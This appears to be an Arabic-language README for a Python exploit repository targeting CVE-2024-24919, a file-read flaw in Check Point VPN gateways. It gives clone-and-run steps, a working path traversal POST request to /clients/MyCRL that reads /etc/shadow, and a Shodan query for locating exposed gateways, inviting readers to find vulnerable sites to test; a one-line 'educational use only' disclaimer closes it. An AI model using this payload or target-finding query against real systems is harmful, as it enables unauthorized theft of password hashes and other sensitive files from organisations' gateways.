
CVE-2024-24919 استغلال وPoC - LFI حرج للوصول عن بعد عبر VPN أو الوصول عبر الجوال.
يحتوي هذا المستودع على استغلال بلغة بايثون للثغرة CVE-2024-24919، وهي ثغرة تسمح لك بقراءة الملفات الحساسة من الصفحة المعرضة للخطر.
يقوم هذا الاستغلال أولاً بالتحقق مما إذا كان الهدف معرضًا للخطر، ثم يحصل على المسار الذي تحدده.
الخطورة: حرجة
أولاً قم باستنساخ المستودع:
git clone https://github.com/Rug4lo/CVE-2024-24919-Exploit
cd CVE-2024-24919-Exploit
امنح الصلاحيات وقم بتنفيذ الاستغلال باستخدام python3
chmod +x exploit.py
python3 exploit.py
ثم اتبع الخطوات وستحصل على بيانات الملف الذي تحدده
إذا كنت تواجه صعوبة، تأكد من أن عنوان URL الذي تحدده هو الرئيسي
✓ https://google.com
✘ https://google.com/search?client=firefox
أولاً نحتاج للتأكد من أن الموقع يحتوي على بوابات أمان Check Point مع تمكين الوصول عن بُعد عبر VPN أو برنامج الوصول عبر الهاتف المحمول.
في هذا الاستغلال نشير إلى نقطة النهاية {ip}/clients/MyCRL.
هذه النقطة النهائية معرضة للخطر إذا قمنا بإرسال طلب POST، نضيف السلسلة CSHELL/ ومسار الملف الذي نريد قراءته باستخدام Path Traversal.
سيكون الطلب شيئًا كهذا:
POST /clients/MyCRL HTTP/1.1
Host: <redacted>
Content-Length: 39
aCSHELL/../../../../../../../etc/shadow
نحصل على كل هذا من خلال النظر إلى الكود المصدري
لمزيد من المعلومات حول العملية، تحقق من هذه المقالة --> https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
إذا كنت تريد اختبار هذه الثغرة، يمكنك استخدام Sodan للعثور على بعض المواقع المعرضة للخطر، باستخدام هذا الاستعلام في sodan
Server: "Check Point SVN Foundation"
https://nvd.nist.gov/vuln/detail/CVE-2024-24919 https://www.cronup.com/cve-2024-24919-zeroday-critico-explotado-activamente-en-vpns-check-point/ https://www.incibe.es/incibe-cert/alerta-temprana/vulnerabilidades/cve-2024-24919
هذا النص البرمجي لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن بالوصول إليها.